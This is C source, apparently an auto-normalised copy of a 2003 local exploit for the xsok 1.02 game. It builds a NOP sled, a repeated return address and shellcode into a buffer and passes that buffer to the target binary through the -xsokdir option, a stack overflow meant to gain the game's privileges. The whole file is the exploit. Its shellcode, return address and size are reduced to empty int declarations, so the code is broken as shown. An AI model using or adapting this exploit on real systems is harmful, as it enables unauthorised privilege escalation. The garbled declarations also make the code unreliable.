
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BIN ;
 int RETADD ;
 int SIZE ;
 int execl (int ,int ,char*,char*,int) ;
 int fprintf (int ,char*) ;
 int memcpy (char*,int ,int ) ;
 int memset (char*,int,int) ;
 int shellcode ;
 int stdout ;
 int strlen (int ) ;

int main (int argc, char ** argv)
{
 int i, ret = RETADD;
 char out[SIZE];

 fprintf(stdout, "\n ---   0x333xsok => xsok 1.02 local games exploit   ---\n");
 fprintf(stdout, "   ---       Outsiders Se(c)urity Labs 2003       ---\n\n");

 int *xsok = (int *)(out);

 for (i=0; i<SIZE-1 ; i+=4, *xsok++ = ret);

 memset((char *)out, 0x90, 63);
 memcpy((char *)out+63, shellcode, strlen(shellcode));

 execl (BIN, BIN, "-xsokdir", out, 0x0);
}
